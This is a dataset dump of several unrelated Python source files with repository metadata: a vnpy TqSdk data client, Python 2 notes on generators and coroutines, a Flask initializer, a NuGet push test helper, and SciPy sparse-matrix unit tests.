5000, # twopLr
0, # twopLowerLr
0.02, # twopDelta
]
FILE_NAME = "combined2_37_specific5"
analyze_dir_with_params(FILE_NAME, dir_params)
result = pd.DataFrame(data, columns=["combLr", "combLowerLr", "combMinProba", "twopLr", "twopLowerLr", "twopDelta",
"diffRate", "absDiffRate", "avgSig", "sigFinal", "file_name"])
result.to_csv("/cs/labs/schapiram/shaymar/comb-fixed-%s.csv" % FILE_NAME)
print(result)
|
[
"shay.margolis@mail.huji.ac.il"
] |
shay.margolis@mail.huji.ac.il
|
6164cedce8bab869c9e6734a74467c0777d4fa13
|
3d899feb92ce18a45e24426dc3b8650cd253818c
|
/vnpy/ppo/tqdata.py
|
1b0aeb1243639eab0fd6312294f55005728aa80d
|
[] |
no_license
|
qzl18/Quantitative-Trading-Demo
|
bbdd6756101d905da4dd1c1fda7e35f476aff7ec
|
20bbed0335fab4e49aa64d9702b948519a1bc277
|
refs/heads/master
| 2023-03-17T15:02:55.499729
| 2021-02-08T04:23:10
| 2021-02-08T04:23:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,394
|
py
|
import pandas as pd
from tqsdk import TqApi
from datetime import timedelta
from typing import List, Optional
from .setting import SETTINGS
from .constant import Exchange, Interval
from .object import BarData, HistoryRequest
# Timestamp alignment: TqSdk timestamps are offset by 8 hours (in nanoseconds)
TIME_GAP = 8 * 60 * 60 * 1000000000
INTERVAL_VT2TQ = {
Interval.MINUTE: 60,
Interval.HOUR: 60 * 60,
Interval.DAILY: 60 * 60 * 24,
}
class TianqinClient:
"""
Client for querying history data from Tianqin.
"""
def __init__(self):
""""""
self.inited: bool = False
self.symbols: set = set()
self.api = None
def init(self) -> bool:
""""""
if self.inited:
return True
try:
self.api = TqApi()
            # Fetch the full list of available contracts
            self.symbols = [k for k, v in self.api._data["quotes"].items()]
        except Exception:
return False
self.inited = True
return True
def to_tq_symbol(self, symbol: str, exchange: Exchange) -> str:
"""
TQSdk exchange first
"""
for count, word in enumerate(symbol):
if word.isdigit():
break
# Check for index symbol
time_str = symbol[count:]
if time_str in ["88"]:
return f"KQ.m@{exchange}.{symbol[:count]}"
if time_str in ["99"]:
return f"KQ.i@{exchange}.{symbol[:count]}"
return f"{exchange.value}.{symbol}"
def query_history(self, req: HistoryRequest) -> Optional[List[BarData]]:
"""
Query history bar data from TqSdk.
"""
symbol = req.symbol
exchange = req.exchange
interval = req.interval
start = req.start
end = req.end
tq_symbol = self.to_tq_symbol(symbol, exchange)
if tq_symbol not in self.symbols:
return None
tq_interval = INTERVAL_VT2TQ.get(interval)
if not tq_interval:
return None
# For querying night trading period data
end += timedelta(1)
# Only query open interest for futures contract
        # TqSdk can only backfill the most recent bars; a specific date range cannot be requested
        df = self.api.get_kline_serial(tq_symbol, tq_interval, 8000).sort_values(by=["datetime"])
        # Align timestamps (shift by the 8-hour offset defined in TIME_GAP)
        df["datetime"] = pd.to_datetime(df["datetime"] + TIME_GAP)
        # Filter rows to the requested start/end window
df = df[(df['datetime'] >= start - timedelta(days=1)) & (df['datetime'] < end)]
data: List[BarData] = []
if df is not None:
for ix, row in df.iterrows():
bar = BarData(
symbol=symbol,
exchange=exchange,
interval=interval,
datetime=row["datetime"].to_pydatetime(),
open_price=row["open"],
high_price=row["high"],
low_price=row["low"],
close_price=row["close"],
volume=row["volume"],
open_interest=row.get("open_oi", 0),
gateway_name="TQ",
)
data.append(bar)
return data
# At most 8000 bars can be downloaded per call; useful for topping up data at runtime
tqdata_client = TianqinClient()
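# A minimal usage sketch (not part of the original module). The contract
# symbol and exchange below are assumptions; any future supported by the
# connected TqSdk account would work the same way.
if __name__ == "__main__":
    from datetime import datetime
    if tqdata_client.init():
        req = HistoryRequest(
            symbol="cu2103",
            exchange=Exchange.SHFE,
            interval=Interval.MINUTE,
            start=datetime(2021, 1, 1),
            end=datetime(2021, 1, 5),
        )
        bars = tqdata_client.query_history(req)
        print(len(bars) if bars else 0)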
|
[
"xieyi@aksofy.cn"
] |
xieyi@aksofy.cn
|
726c876fb262f2048686ccf86e30f17fe5ee050b
|
3c5e61b9762ee1fcb26439fa722c1c0e2600b0db
|
/notebook/iternote/note.py
|
0c0b4724db35dc537cd7f858574d28923e820d44
|
[] |
no_license
|
jacksonyoudi/python-note
|
ccf5406faaf15a15abae5dbf5a993b91131d2dd5
|
098b4c4e8e713948ca96ef732c19f3b5efe60cbe
|
refs/heads/master
| 2021-01-17T15:13:12.573714
| 2016-10-25T03:09:24
| 2016-10-25T03:09:24
| 69,309,792
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,073
|
py
|
# coding: utf8
# An iterator is just a container object that implements the iteration
# protocol. It is based on two methods:
#   next     -- returns the next item of the container
#   __iter__ -- returns the iterator itself
# An iterator can be created with the iter() builtin and a sequence.
i = iter('abc')
i.next()
# When the sequence is exhausted, a StopIteration exception is raised.

# Generators
# Based on the yield statement, a function can be paused and return an
# intermediate result. The function saves its execution context and can be
# resumed later when necessary.
def fibonacci():
    a, b = 0, 1
    while True:
        yield b
        a, b = b, a + b

# The function returns a special iterator, a generator object, which knows how
# to save its execution context. Each call to it produces the next element of
# the sequence, with no predetermined end.
# Generators also help reduce program complexity and can improve the
# performance of data-transformation algorithms that run over several
# sequences.
# Treating each sequence as an iterator and combining them in a higher-level
# function is a good way to keep a function from becoming huge, ugly and
# incomprehensible. Moreover, it provides real-time feedback to the whole
# processing chain.
def power(values):
    for value in values:
        print 'powering %s' % value
        yield value

def adder(values):
    for value in values:
        print 'adding to %s' % value
        if value % 2 == 0:
            yield value + 3
        else:
            yield value + 2

elements = [1, 4, 7, 9, 12, 19]
res = adder(power(elements))
# Nested, multi-level yield statements:
res.next()

# Keep the code simple, not the data:
# many simple iterable functions that process sequences are better than one
# complex function that computes a single value at a time.
# Another generator-related feature introduced in Python is the ability to
# interact with the code that calls next: yield becomes an expression, and a
# value can be passed to it through a new method called send.
def psychoologist():
    print 'Please tell me your problems'
    while True:
        answer = (yield)
        if answer is not None:
            if answer.endswith('?'):
                print ("Don't ask yourself too much questions")
            elif 'good' in answer:
                print "A that's good, go on"
            elif 'bad' in answer:
                print "Don't be so negative"

# Coroutines
# Coroutines are functions that can be suspended, resumed, and that have
# several entry points. Some languages provide this natively, e.g. Io and Lua,
# where it enables cooperative multitasking and pipeline mechanisms.
# For example, each coroutine consumes or produces data and then pauses until
# other data is passed to it.
# In Python the usual alternative to coroutines is threads, which also allow
# blocks of code to interact. Because threads are preemptive, resource locking
# has to be handled, which coroutines do not need; such code can become quite
# complex and hard to create and debug. Generators, however, are almost
# coroutines: send, throw and close were added with the original intent of
# giving the language a coroutine-like feature.
import multitask
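# A short usage sketch (not part of the original note) of the send() protocol
# described above; Python 2 syntax, matching the rest of this file.
psy = psychoologist()
psy.next()                        # advance to the first (yield)
psy.send('I feel bad')            # -> Don't be so negative
psy.send('Why do I feel bad?')    # -> Don't ask yourself too much questions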
|
[
"liangchangyoujackson@gmail.com"
] |
liangchangyoujackson@gmail.com
|
cee8c8a80f0d94dd1e8ff71f232cf9abe16c0033
|
f0b6b2fdada21ba0c3cbd04144e7bc6c00eaf762
|
/standards/__init__.py
|
e183e96df57a78ff309bfe53cc1d1ed593a9eb2c
|
[] |
no_license
|
RomanSavran/ontology-api
|
437d079f5fa576c75a0b7e7ce535c07e54cac800
|
07aa35738e4314b9383d5e9b72ccffec675d3613
|
refs/heads/master
| 2023-01-19T20:57:16.042616
| 2020-11-16T08:23:19
| 2020-11-16T08:23:19
| 298,217,890
| 0
| 2
| null | 2020-11-16T08:23:20
| 2020-09-24T08:35:11
|
Python
|
UTF-8
|
Python
| false
| false
| 277
|
py
|
from flask import Flask
from logging.config import dictConfig
app = Flask(__name__)
app.config.from_object("standards.config.Config")
dictConfig(app.config.get('LOGGING_CONFIG', {}))
from standards.api import api_bp # noqa
app.register_blueprint(api_bp, url_prefix='/api/')
|
[
"y.beshta@uds.systems"
] |
y.beshta@uds.systems
|
d1ed2f23948319d744c9cc1b2926a9bf1b0c70c7
|
9ead001429ed7123063c38654a5f3cb2873ebd7c
|
/sce/slides/python/pra/Python Tutorial/Func3.py~
|
b27c2b1c6693e002479de887ad6775ca8d5c9f1e
|
[] |
no_license
|
smadala/IIIT-PG11
|
73646632de36c0774413f1e201d9ce14895ae645
|
a0f350261732442838314fcf821f7dad0a6c7b7b
|
refs/heads/master
| 2021-01-23T13:30:05.050032
| 2013-11-13T11:03:30
| 2013-11-13T11:03:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 249
|
#!/bin/python
import sys
# Function with command line arguments
def display(args):
print 'Number of arguments passed = ', len(args)
print 'Arguments passed = ', str(args)
display(sys.argv) # sys.argv = arguments passed from the command line
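# Example invocation (assumed):
#   python Func3.py a b c
# prints "Number of arguments passed =  4", since sys.argv[0] is the script name.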
|
[
"satya@Satya-PC.(none)"
] |
satya@Satya-PC.(none)
|
|
22534f5284e4018a59dbe29907518cb3caa32436
|
768763d058a7ad809c7214d9b06619d5164d487c
|
/tests/helpers.py
|
9aca21e2c20f00076c1bbf280807897b49d31db8
|
[
"MIT"
] |
permissive
|
dougthor42/pynuget
|
14d764a3e0d853fd405f3d3ab02bd1433b0fb40f
|
a7a5e769badf57bb178200c1e788980840929936
|
refs/heads/master
| 2023-03-04T00:05:29.403875
| 2021-04-02T20:39:22
| 2021-04-02T20:39:22
| 130,394,863
| 7
| 2
|
MIT
| 2022-07-06T19:50:33
| 2018-04-20T17:38:11
|
Python
|
UTF-8
|
Python
| false
| false
| 593
|
py
|
# -*- coding: utf-8 -*-
"""
"""
import os
DATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data")
def check_push(expected_code, client, header, file=None):
    """Send a PUT to the package API (optionally attaching a .nupkg file from
    DATA_DIR) and assert that the response status code equals expected_code."""
data = None
if file:
nupkg_file = os.path.join(DATA_DIR, file)
openf = open(nupkg_file, 'rb')
data = {'package': (openf, 'filename.nupkg')}
rv = client.put(
'/api/v2/package/',
headers=header,
follow_redirects=True,
data=data,
)
try:
openf.close()
except Exception:
pass
assert rv.status_code == expected_code
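# A hypothetical example of how a test might call check_push; the `client` and
# `header` fixtures and the package file name are assumptions, not part of
# this module.
#
#     def test_push_ok(client, header):
#         check_push(201, client, header, file="good.nupkg")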
|
[
"doug.thor@gmail.com"
] |
doug.thor@gmail.com
|
d235f1c3797262d25e0f26ab7ec719b26e84ca21
|
c0f808504dd3d7fd27c39f1503fbc14c1d37bf9f
|
/sources/scipy-scipy-414c1ab/scipy/sparse/tests/test_base.py
|
2d2163b637b26a86195ddfd73774d3d76ce5e2f4
|
[] |
no_license
|
georgiee/lip-sync-lpc
|
7662102d4715e4985c693b316a02d11026ffb117
|
e931cc14fe4e741edabd12471713bf84d53a4250
|
refs/heads/master
| 2018-09-16T08:47:26.368491
| 2018-06-05T17:01:08
| 2018-06-05T17:01:08
| 5,779,592
| 17
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 65,539
|
py
|
#
# Authors: Travis Oliphant, Ed Schofield, Robert Cimrman, Nathan Bell, and others
""" Test functions for sparse matrices
"""
__usage__ = """
Build sparse:
python setup.py build
Run tests if scipy is installed:
python -c 'import scipy;scipy.sparse.test()'
Run tests if sparse is not installed:
python tests/test_sparse.py
"""
import sys
import warnings
import numpy as np
from numpy import arange, zeros, array, dot, matrix, asmatrix, asarray, \
vstack, ndarray, transpose, diag, kron, inf, conjugate, \
int8, ComplexWarning
import random
from numpy.testing import assert_raises, assert_equal, assert_array_equal, \
assert_array_almost_equal, assert_almost_equal, assert_, \
dec, TestCase, run_module_suite
import scipy.linalg
import scipy.sparse as sparse
from scipy.sparse import csc_matrix, csr_matrix, dok_matrix, \
coo_matrix, lil_matrix, dia_matrix, bsr_matrix, \
eye, isspmatrix, SparseEfficiencyWarning
from scipy.sparse.sputils import supported_dtypes
from scipy.sparse.linalg import splu, expm, inv
warnings.simplefilter('ignore', SparseEfficiencyWarning)
warnings.simplefilter('ignore', ComplexWarning)
#TODO check that spmatrix( ... , copy=X ) is respected
#TODO test prune
#TODO test has_sorted_indices
class _TestCommon:
"""test common functionality shared by all sparse formats"""
def setUp(self):
self.dat = matrix([[1,0,0,2],[3,0,1,0],[0,2,0,0]],'d')
self.datsp = self.spmatrix(self.dat)
def test_empty(self):
"""create empty matrices"""
assert_equal(self.spmatrix((3,3)).todense(), np.zeros((3,3)))
assert_equal(self.spmatrix((3,3)).nnz, 0)
def test_invalid_shapes(self):
assert_raises(ValueError, self.spmatrix, (-1,3) )
assert_raises(ValueError, self.spmatrix, (3,-1) )
assert_raises(ValueError, self.spmatrix, (-1,-1) )
def test_repr(self):
repr(self.datsp)
def test_str(self):
str(self.datsp)
def test_empty_arithmetic(self):
"""Test manipulating empty matrices. Fails in SciPy SVN <= r1768
"""
shape = (5, 5)
for mytype in [np.dtype('int32'), np.dtype('float32'),
np.dtype('float64'), np.dtype('complex64'),
np.dtype('complex128')]:
a = self.spmatrix(shape, dtype=mytype)
b = a + a
c = 2 * a
d = a * a.tocsc()
e = a * a.tocsr()
f = a * a.tocoo()
for m in [a,b,c,d,e,f]:
assert_equal(m.A, a.A*a.A)
# These fail in all revisions <= r1768:
assert_equal(m.dtype,mytype)
assert_equal(m.A.dtype,mytype)
def test_abs(self):
A = matrix([[-1, 0, 17],[0, -5, 0],[1, -4, 0],[0,0,0]],'d')
assert_equal(abs(A),abs(self.spmatrix(A)).todense())
def test_neg(self):
A = matrix([[-1, 0, 17],[0, -5, 0],[1, -4, 0],[0,0,0]],'d')
assert_equal(-A,(-self.spmatrix(A)).todense())
def test_real(self):
D = matrix([[1 + 3j, 2 - 4j]])
A = self.spmatrix(D)
assert_equal(A.real.todense(),D.real)
def test_imag(self):
D = matrix([[1 + 3j, 2 - 4j]])
A = self.spmatrix(D)
assert_equal(A.imag.todense(),D.imag)
def test_diagonal(self):
"""Does the matrix's .diagonal() method work?
"""
mats = []
mats.append( [[1,0,2]] )
mats.append( [[1],[0],[2]] )
mats.append( [[0,1],[0,2],[0,3]] )
mats.append( [[0,0,1],[0,0,2],[0,3,0]] )
mats.append( kron(mats[0],[[1,2]]) )
mats.append( kron(mats[0],[[1],[2]]) )
mats.append( kron(mats[1],[[1,2],[3,4]]) )
mats.append( kron(mats[2],[[1,2],[3,4]]) )
mats.append( kron(mats[3],[[1,2],[3,4]]) )
mats.append( kron(mats[3],[[1,2,3,4]]) )
for m in mats:
assert_equal(self.spmatrix(m).diagonal(),diag(m))
def test_nonzero(self):
A = array([[1, 0, 1],[0, 1, 1],[ 0, 0, 1]])
Asp = self.spmatrix(A)
A_nz = set( [tuple(ij) for ij in transpose(A.nonzero())] )
Asp_nz = set( [tuple(ij) for ij in transpose(Asp.nonzero())] )
assert_equal(A_nz, Asp_nz)
def test_getrow(self):
assert_array_equal(self.datsp.getrow(1).todense(), self.dat[1,:])
assert_array_equal(self.datsp.getrow(-1).todense(), self.dat[-1,:])
def test_getcol(self):
assert_array_equal(self.datsp.getcol(1).todense(), self.dat[:,1])
assert_array_equal(self.datsp.getcol(-1).todense(), self.dat[:,-1])
def test_sum(self):
"""Does the matrix's .sum(axis=...) method work?
"""
assert_array_equal(self.dat.sum(), self.datsp.sum())
assert_array_equal(self.dat.sum(axis=None), self.datsp.sum(axis=None))
assert_array_equal(self.dat.sum(axis=0), self.datsp.sum(axis=0))
assert_array_equal(self.dat.sum(axis=1), self.datsp.sum(axis=1))
def test_mean(self):
"""Does the matrix's .mean(axis=...) method work?
"""
assert_array_equal(self.dat.mean(), self.datsp.mean())
assert_array_equal(self.dat.mean(axis=None), self.datsp.mean(axis=None))
assert_array_equal(self.dat.mean(axis=0), self.datsp.mean(axis=0))
assert_array_equal(self.dat.mean(axis=1), self.datsp.mean(axis=1))
def test_expm(self):
M = array([[1, 0, 2], [0, 0, 3], [-4, 5, 6]], float)
sM = self.spmatrix(M, shape=(3,3), dtype=float)
Mexp = scipy.linalg.expm(M)
sMexp = expm(sM).todense()
assert_array_almost_equal((sMexp - Mexp), zeros((3, 3)))
N = array([[ 3., 0., 1.], [ 0., 2., 0.], [ 0., 0., 0.]])
sN = self.spmatrix(N, shape=(3,3), dtype=float)
Nexp = scipy.linalg.expm(N)
sNexp = expm(sN).todense()
assert_array_almost_equal((sNexp - Nexp), zeros((3, 3)))
def test_inv(self):
M = array([[1, 0, 2], [0, 0, 3], [-4, 5, 6]], float)
sM = self.spmatrix(M, shape=(3,3), dtype=float)
sMinv = inv(sM)
assert_array_almost_equal(sMinv.dot(sM).todense(), np.eye(3))
def test_from_array(self):
A = array([[1,0,0],[2,3,4],[0,5,0],[0,0,0]])
assert_array_equal(self.spmatrix(A).toarray(), A)
A = array([[1.0 + 3j, 0, 0],
[ 0, 2.0 + 5, 0],
[ 0, 0, 0]])
assert_array_equal(self.spmatrix(A).toarray(), A)
assert_array_equal(self.spmatrix(A, dtype='int16').toarray(), A.astype('int16'))
def test_from_matrix(self):
A = matrix([[1,0,0],[2,3,4],[0,5,0],[0,0,0]])
assert_array_equal(self.spmatrix(A).todense(), A)
A = matrix([[1.0 + 3j, 0, 0],
[ 0, 2.0 + 5, 0],
[ 0, 0, 0]])
assert_array_equal(self.spmatrix(A).toarray(), A)
assert_array_equal(self.spmatrix(A, dtype='int16').toarray(), A.astype('int16'))
def test_from_list(self):
A = [[1,0,0],[2,3,4],[0,5,0],[0,0,0]]
assert_array_equal(self.spmatrix(A).todense(), A)
A = [[1.0 + 3j, 0, 0],
[ 0, 2.0 + 5, 0],
[ 0, 0, 0]]
assert_array_equal(self.spmatrix(A).toarray(), array(A))
assert_array_equal(self.spmatrix(A, dtype='int16').todense(), array(A).astype('int16'))
def test_from_sparse(self):
D = array([[1,0,0],[2,3,4],[0,5,0],[0,0,0]])
S = csr_matrix(D)
assert_array_equal(self.spmatrix(S).toarray(), D)
S = self.spmatrix(D)
assert_array_equal(self.spmatrix(S).toarray(), D)
D = array([[1.0 + 3j, 0, 0],
[ 0, 2.0 + 5, 0],
[ 0, 0, 0]])
S = csr_matrix(D)
assert_array_equal(self.spmatrix(S).toarray(), D)
assert_array_equal(self.spmatrix(S, dtype='int16').toarray(), D.astype('int16'))
S = self.spmatrix(D)
assert_array_equal(self.spmatrix(S).toarray(), D)
assert_array_equal(self.spmatrix(S, dtype='int16').toarray(), D.astype('int16'))
#def test_array(self):
# """test array(A) where A is in sparse format"""
# assert_equal( array(self.datsp), self.dat )
def test_todense(self):
# Check C-contiguous (default).
chk = self.datsp.todense()
assert_array_equal(chk, self.dat)
assert_(chk.flags.c_contiguous)
assert_(not chk.flags.f_contiguous)
# Check C-contiguous (with arg).
chk = self.datsp.todense(order='C')
assert_array_equal(chk, self.dat)
assert_(chk.flags.c_contiguous)
assert_(not chk.flags.f_contiguous)
# Check F-contiguous (with arg).
chk = self.datsp.todense(order='F')
assert_array_equal(chk, self.dat)
assert_(not chk.flags.c_contiguous)
assert_(chk.flags.f_contiguous)
# Check with out argument (array).
out = np.zeros(self.datsp.shape, dtype=self.datsp.dtype)
chk = self.datsp.todense(out=out)
assert_array_equal(self.dat, out)
assert_array_equal(self.dat, chk)
assert_(chk.base is out)
# Check with out array (matrix).
out = np.asmatrix(np.zeros(self.datsp.shape, dtype=self.datsp.dtype))
chk = self.datsp.todense(out=out)
assert_array_equal(self.dat, out)
assert_array_equal(self.dat, chk)
assert_(chk is out)
a = matrix([1.,2.,3.])
dense_dot_dense = a * self.dat
check = a * self.datsp.todense()
assert_array_equal(dense_dot_dense, check)
b = matrix([1.,2.,3.,4.]).T
dense_dot_dense = self.dat * b
check2 = self.datsp.todense() * b
assert_array_equal(dense_dot_dense, check2)
def test_toarray(self):
# Check C-contiguous (default).
dat = asarray(self.dat)
chk = self.datsp.toarray()
assert_array_equal(chk, dat)
assert_(chk.flags.c_contiguous)
assert_(not chk.flags.f_contiguous)
# Check C-contiguous (with arg).
chk = self.datsp.toarray(order='C')
assert_array_equal(chk, dat)
assert_(chk.flags.c_contiguous)
assert_(not chk.flags.f_contiguous)
# Check F-contiguous (with arg).
chk = self.datsp.toarray(order='F')
assert_array_equal(chk, dat)
assert_(not chk.flags.c_contiguous)
assert_(chk.flags.f_contiguous)
# Check with output arg.
out = np.zeros(self.datsp.shape, dtype=self.datsp.dtype)
self.datsp.toarray(out=out)
assert_array_equal(chk, dat)
# Check that things are fine when we don't initialize with zeros.
out[...] = 1.
self.datsp.toarray(out=out)
assert_array_equal(chk, dat)
a = array([1.,2.,3.])
dense_dot_dense = dot(a, dat)
check = dot(a, self.datsp.toarray())
assert_array_equal(dense_dot_dense, check)
b = array([1.,2.,3.,4.])
dense_dot_dense = dot(dat, b)
check2 = dot(self.datsp.toarray(), b)
assert_array_equal(dense_dot_dense, check2)
def test_astype(self):
D = array([[1.0 + 3j, 0, 0],
[ 0, 2.0 + 5, 0],
[ 0, 0, 0]])
S = self.spmatrix(D)
for x in supported_dtypes:
assert_equal(S.astype(x).dtype, D.astype(x).dtype) # correct type
assert_equal(S.astype(x).toarray(), D.astype(x)) # correct values
assert_equal(S.astype(x).format, S.format) # format preserved
def test_asfptype(self):
A = self.spmatrix( arange(6,dtype='int32').reshape(2,3) )
assert_equal( A.dtype , np.dtype('int32') )
assert_equal( A.asfptype().dtype, np.dtype('float64') )
assert_equal( A.asfptype().format, A.format )
assert_equal( A.astype('int16').asfptype().dtype , np.dtype('float32') )
assert_equal( A.astype('complex128').asfptype().dtype , np.dtype('complex128') )
B = A.asfptype()
C = B.asfptype()
assert_( B is C )
def test_mul_scalar(self):
assert_array_equal(self.dat*2,(self.datsp*2).todense())
assert_array_equal(self.dat*17.3,(self.datsp*17.3).todense())
def test_rmul_scalar(self):
assert_array_equal(2*self.dat,(2*self.datsp).todense())
assert_array_equal(17.3*self.dat,(17.3*self.datsp).todense())
def test_add(self):
a = self.dat.copy()
a[0,2] = 2.0
b = self.datsp
c = b + a
assert_array_equal(c,[[2,0,2,4],[6,0,2,0],[0,4,0,0]])
def test_radd(self):
a = self.dat.copy()
a[0,2] = 2.0
b = self.datsp
c = a + b
assert_array_equal(c,[[2,0,2,4],[6,0,2,0],[0,4,0,0]])
def test_sub(self):
assert_array_equal((self.datsp - self.datsp).todense(),[[0,0,0,0],[0,0,0,0],[0,0,0,0]])
A = self.spmatrix(matrix([[1,0,0,4],[-1,0,0,0],[0,8,0,-5]],'d'))
assert_array_equal((self.datsp - A).todense(),self.dat - A.todense())
assert_array_equal((A - self.datsp).todense(),A.todense() - self.dat)
def test_rsub(self):
assert_array_equal((self.dat - self.datsp),[[0,0,0,0],[0,0,0,0],[0,0,0,0]])
assert_array_equal((self.datsp - self.dat),[[0,0,0,0],[0,0,0,0],[0,0,0,0]])
A = self.spmatrix(matrix([[1,0,0,4],[-1,0,0,0],[0,8,0,-5]],'d'))
assert_array_equal((self.dat - A),self.dat - A.todense())
assert_array_equal((A - self.dat),A.todense() - self.dat)
assert_array_equal(A.todense() - self.datsp,A.todense() - self.dat)
assert_array_equal(self.datsp - A.todense(),self.dat - A.todense())
def test_add0(self):
""" Adding 0 to a sparse matrix """
assert_array_equal((self.datsp + 0).todense(), self.dat)
# use sum (which takes 0 as a starting value)
sumS = sum([k * self.datsp for k in range(1, 3)])
sumD = sum([k * self.dat for k in range(1, 3)])
assert_almost_equal(sumS.todense(), sumD)
def test_elementwise_multiply(self):
# real/real
A = array([[4,0,9],[2,-3,5]])
B = array([[0,7,0],[0,-4,0]])
Asp = self.spmatrix(A)
Bsp = self.spmatrix(B)
assert_almost_equal( Asp.multiply(Bsp).todense(), A*B) #sparse/sparse
assert_almost_equal( Asp.multiply(B), A*B) #sparse/dense
# complex/complex
C = array([[1-2j,0+5j,-1+0j],[4-3j,-3+6j,5]])
D = array([[5+2j,7-3j,-2+1j],[0-1j,-4+2j,9]])
Csp = self.spmatrix(C)
Dsp = self.spmatrix(D)
assert_almost_equal( Csp.multiply(Dsp).todense(), C*D) #sparse/sparse
assert_almost_equal( Csp.multiply(D), C*D) #sparse/dense
# real/complex
assert_almost_equal( Asp.multiply(Dsp).todense(), A*D) #sparse/sparse
assert_almost_equal( Asp.multiply(D), A*D) #sparse/dense
def test_elementwise_divide(self):
expected = [[1,0,0,1],[1,0,1,0],[0,1,0,0]]
assert_array_equal((self.datsp / self.datsp).todense(),expected)
denom = self.spmatrix(matrix([[1,0,0,4],[-1,0,0,0],[0,8,0,-5]],'d'))
res = matrix([[1,0,0,0.5],[-3,0,inf,0],[0,0.25,0,0]],'d')
assert_array_equal((self.datsp / denom).todense(),res)
# complex
A = array([[1-2j,0+5j,-1+0j],[4-3j,-3+6j,5]])
B = array([[5+2j,7-3j,-2+1j],[0-1j,-4+2j,9]])
Asp = self.spmatrix(A)
Bsp = self.spmatrix(B)
assert_almost_equal( (Asp / Bsp).todense(), A/B)
def test_pow(self):
A = matrix([[1,0,2,0],[0,3,4,0],[0,5,0,0],[0,6,7,8]])
B = self.spmatrix( A )
for exponent in [0,1,2,3]:
assert_array_equal((B**exponent).todense(),A**exponent)
#invalid exponents
for exponent in [-1, 2.2, 1 + 3j]:
self.assertRaises( Exception, B.__pow__, exponent )
#nonsquare matrix
B = self.spmatrix(A[:3,:])
self.assertRaises( Exception, B.__pow__, 1 )
def test_rmatvec(self):
M = self.spmatrix(matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]]))
assert_array_almost_equal([1,2,3,4]*M, dot([1,2,3,4], M.toarray()))
row = matrix([[1,2,3,4]])
assert_array_almost_equal(row*M, row*M.todense())
def test_small_multiplication(self):
"""test that A*x works for x with shape () (1,) and (1,1)
"""
A = self.spmatrix([[1],[2],[3]])
assert_(isspmatrix(A * array(1)))
assert_equal((A * array(1)).todense(), [[1],[2],[3]])
assert_equal(A * array([1]), array([1,2,3]))
assert_equal(A * array([[1]]), array([[1],[2],[3]]))
def test_matvec(self):
M = self.spmatrix(matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]]))
col = matrix([1,2,3]).T
assert_array_almost_equal(M * col, M.todense() * col)
#check result dimensions (ticket #514)
assert_equal((M * array([1,2,3])).shape,(4,))
assert_equal((M * array([[1],[2],[3]])).shape,(4,1))
assert_equal((M * matrix([[1],[2],[3]])).shape,(4,1))
#check result type
assert_(isinstance( M * array([1,2,3]), ndarray))
assert_(isinstance( M * matrix([1,2,3]).T, matrix))
#ensure exception is raised for improper dimensions
bad_vecs = [array([1,2]), array([1,2,3,4]), array([[1],[2]]),
matrix([1,2,3]), matrix([[1],[2]])]
for x in bad_vecs:
assert_raises(ValueError, M.__mul__, x)
# Should this be supported or not?!
#flat = array([1,2,3])
#assert_array_almost_equal(M*flat, M.todense()*flat)
# Currently numpy dense matrices promote the result to a 1x3 matrix,
# whereas sparse matrices leave the result as a rank-1 array. Which
# is preferable?
# Note: the following command does not work. Both NumPy matrices
# and spmatrices should raise exceptions!
# assert_array_almost_equal(M*[1,2,3], M.todense()*[1,2,3])
# The current relationship between sparse matrix products and array
# products is as follows:
assert_array_almost_equal(M*array([1,2,3]), dot(M.A,[1,2,3]))
assert_array_almost_equal(M*[[1],[2],[3]], asmatrix(dot(M.A,[1,2,3])).T)
# Note that the result of M * x is dense if x has a singleton dimension.
# Currently M.matvec(asarray(col)) is rank-1, whereas M.matvec(col)
# is rank-2. Is this desirable?
def test_matmat_sparse(self):
a = matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]])
a2 = array([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]])
b = matrix([[0,1],[1,0],[0,2]],'d')
asp = self.spmatrix(a)
bsp = self.spmatrix(b)
assert_array_almost_equal((asp*bsp).todense(), a*b)
assert_array_almost_equal( asp*b, a*b)
assert_array_almost_equal( a*bsp, a*b)
assert_array_almost_equal( a2*bsp, a*b)
# Now try performing cross-type multplication:
csp = bsp.tocsc()
c = b
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal( asp*c, a*c)
assert_array_almost_equal( a*csp, a*c)
assert_array_almost_equal( a2*csp, a*c)
csp = bsp.tocsr()
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal( asp*c, a*c)
assert_array_almost_equal( a*csp, a*c)
assert_array_almost_equal( a2*csp, a*c)
csp = bsp.tocoo()
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal( asp*c, a*c)
assert_array_almost_equal( a*csp, a*c)
assert_array_almost_equal( a2*csp, a*c)
# Test provided by Andy Fraser, 2006-03-26
L = 30
frac = .3
random.seed(0) # make runs repeatable
A = zeros((L,2))
for i in xrange(L):
for j in xrange(2):
r = random.random()
if r < frac:
A[i,j] = r/frac
A = self.spmatrix(A)
B = A*A.T
assert_array_almost_equal(B.todense(), A.todense() * A.T.todense())
assert_array_almost_equal(B.todense(), A.todense() * A.todense().T)
# check dimension mismatch 2x2 times 3x2
A = self.spmatrix( [[1,2],[3,4]] )
B = self.spmatrix( [[1,2],[3,4],[5,6]] )
assert_raises(ValueError, A.__mul__, B)
def test_matmat_dense(self):
a = matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]])
asp = self.spmatrix(a)
# check both array and matrix types
bs = [ array([[1,2],[3,4],[5,6]]), matrix([[1,2],[3,4],[5,6]]) ]
for b in bs:
result = asp*b
assert_( isinstance(result, type(b)) )
assert_equal( result.shape, (4,2) )
assert_equal( result, dot(a,b) )
def test_sparse_format_conversions(self):
A = sparse.kron( [[1,0,2],[0,3,4],[5,0,0]], [[1,2],[0,3]] )
D = A.todense()
A = self.spmatrix(A)
for format in ['bsr','coo','csc','csr','dia','dok','lil']:
a = A.asformat(format)
assert_equal(a.format,format)
assert_array_equal(a.todense(), D)
